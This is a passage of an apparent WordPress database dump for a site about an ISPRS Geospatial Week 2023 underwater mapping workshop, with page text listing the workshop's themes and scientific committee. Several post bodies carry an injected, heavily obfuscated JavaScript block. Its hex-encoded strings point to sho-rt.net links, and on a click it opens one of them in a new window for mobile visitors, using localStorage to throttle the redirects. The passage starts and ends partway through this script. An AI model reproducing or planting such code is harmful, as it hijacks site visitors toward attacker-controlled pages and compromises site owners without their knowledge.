)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Panagiotis Agrafiotis','','publish','closed','closed','','panagiotis-agrafiotis','','','2022-11-23 06:13:13','2022-11-23 06:13:13','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3347',0,'dt_team','',0),
(3348,1,'2022-11-23 06:12:49','2022-11-23 06:12:49','','w226','','inherit','open','closed','','w226','','','2022-11-23 06:12:49','2022-11-23 06:12:49','',3347,'https://gsw2023.com/wp-content/uploads/2022/11/w226.jpg',0,'attachment','image/jpeg',0),
(3349,1,'2022-11-23 06:14:10','2022-11-23 06:14:10','','w22m2','','inherit','open','closed','','w22m2','','','2022-11-23 06:14:10','2022-11-23 06:14:10','',3334,'https://gsw2023.com/wp-content/uploads/2022/11/w22m2.jpg',0,'attachment','image/jpeg',0),
(3350,1,'2022-11-23 06:14:34','2022-11-23 06:14:34','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3349\" img_size=\"300x400\"][/vc_column][vc_column width=\"3/4\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Underwater Mapping Workshop : Geospatial techniques for underwater documentation, mapping and monitoring</strong>','','inherit','closed','closed','','3334-revision-v1','','','2022-11-23 06:14:34','2022-11-23 06:14:34','',3334,'https://gsw2023.com/?p=3350',0,'revision','',0),
(3351,1,'2022-11-23 06:24:42','2022-11-23 06:24:42','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3349\" img_size=\"300x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">In recent years, there has been a growing interest in methods and techniques for documenting, mapping and monitoring inland, coastal and open sea underwater environments. Drivers are diverse and range from the research of traces from the past to the protection and sustainable use of natural resources, from monitoring of marine ecosystems to hydrological studies. This workshop will gather contributions on state of the art and future trends on, but not limited to, the following topics: underwater photogrammetry, through water airborne photo-bathymetry and lidar-bathymetry, acoustic and optical positioning, underwater geodetic surveying, visual inertial simultaneous localization and mapping, subsea metrology, multi and hyper spectral imaging, underwater autonomous unmanned and tethered systems, underwater change monitoring. The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"turquoise\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"60\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"turquoise\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><u>Themes of event:</u></h5>\n<ul>\n<li>\n<h6><strong>Multimedia geometry for underwater image and range measurements</strong></h6>\n</li>\n<li>\n<h6><strong>Geometric calibration, colour correction and restoration, validation of systems for underwater 3D measurements</strong></h6>\n</li>\n<li>\n<h6><strong>Combined above-water, through-water and underwater techniques for 3D modelling and mapping of coastal habitat</strong></h6>\n</li>\n<li>\n<h6><strong>Lidar, photo and spectrally derived bathymetry for seafloor and water surface measurement</strong></h6>\n</li>\n<li>\n<h6><strong>Spaceborne techniques and applications for coastal mapping</strong></h6>\n</li>\n<li>\n<h6><strong>AI-driven solutions for through-water, underwater and habitat mapping applications</strong></h6>\n</li>\n<li>\n<h6><strong>Algorithms and methods for underwater localization, navigation and mapping, including, SLAM, visual inertial odometry, augmented and virtual reality applications</strong></h6>\n</li>\n<li>\n<h6><strong>Sensors’ integration and performance evaluation of UAVs, UUVs (ROVs and AUVs), towed vehicles and diver operated systems</strong></h6>\n</li>\n<li>\n<h6><strong>Underwater applications and methods in archaeology, habitat mapping and monitoring, industrial metrology and inspections, volumetric reconstruction for flow tracking</strong></h6>\n</li>\n<li>\n<h6><strong>Using/creating benchmark data sets</strong></h6>\n</li>\n</ul>\n<h5 style=\"text-align: justify; color: blue;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Loïca Avanthey, SEAL, LRE, EPITA, France</strong></h6>\n</li>\n<li>\n<h6><strong>Michael Bleier, Computer Science VII: Robotics and Telematics, Julius-Maximilians-Universität Würzburg, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Fabio Bruno, Department of Mechanical, Energetics and Management Engineering, University of Calabria, 3D Research s.r.l., Arcavacata di Rende, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Alessandro Capra, University of Modena and Reggio Emilia, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Silvio Del Pizzo, Parthenope University of Naples, Naples, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Pierre Drap, LIS UMR CNRS, Marseille, France, France</strong></h6>\n</li>\n<li>\n<h6><strong>Nuno Gracias, ViCOROB - Computer vision and robotics research Institute, Universitat de Girona, Spain</strong></h6>\n</li>\n<li>\n<h6><strong>Kevin Köser, Oceanic Machine Vision, GEOMAR Helmholtz Centre for Ocean Research Kiel, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Hans-Gerd Maas, Institute of Photogrammetry and Remote Sensing, TU Dresden, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Nikola Miskovic, Laboratory for Underwater Systems and Technologies – LABUST, Faculty of Electrical Engineering and Computing, Department of Control and Computer Engineering, University of Zagreb, Croatia</strong></h6>\n</li>\n<li>\n<h6><strong>Mohammad Motasem Nawaf, Aix-Marseille University, LIS UMR CNRS, Marseille, France</strong></h6>\n</li>\n<li>\n<h6><strong>Gaia Pavoni, Visual Computing Lab, Institute of Information Science and Technologies \"Alessandro Faedo\" (ISTI), CNR, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Alessandro Ridolfi, Dipartimento di Ingegneria Industriale (DIEF), Università degli Studi di Firenze, Firenze, Italy</strong></h6>\n</li>\n<li>\n<h6><strong>Katja Richter, Institute of Photogrammetry and Remote Sensing, TU Dresden, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Robin Rofallski, Jade University of Applied Sciences, Oldenburg &amp; KARO3D Vision, Oldenburg, Germany</strong></h6>\n</li>\n<li>\n<h6><strong>Mark Shortis, FSSSI FRICS (Retired) Honorary Professor, School of Science RMIT University, Melbourne, Australia</strong></h6>\n</li>\n<li>\n<h6><strong>Tali Treibitz,  Viseaon Marine Imaging Lab, Charney School of Marine Sciences, University of Haifa, Israel</strong></h6>\n</li>\n<li>\n<h6><strong>Patrick Westfeld, Federal Maritime and Hydrographic Agency (BSH), Germany</strong></h6>\n</li>\n</ul>\n<h6><strong>.</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 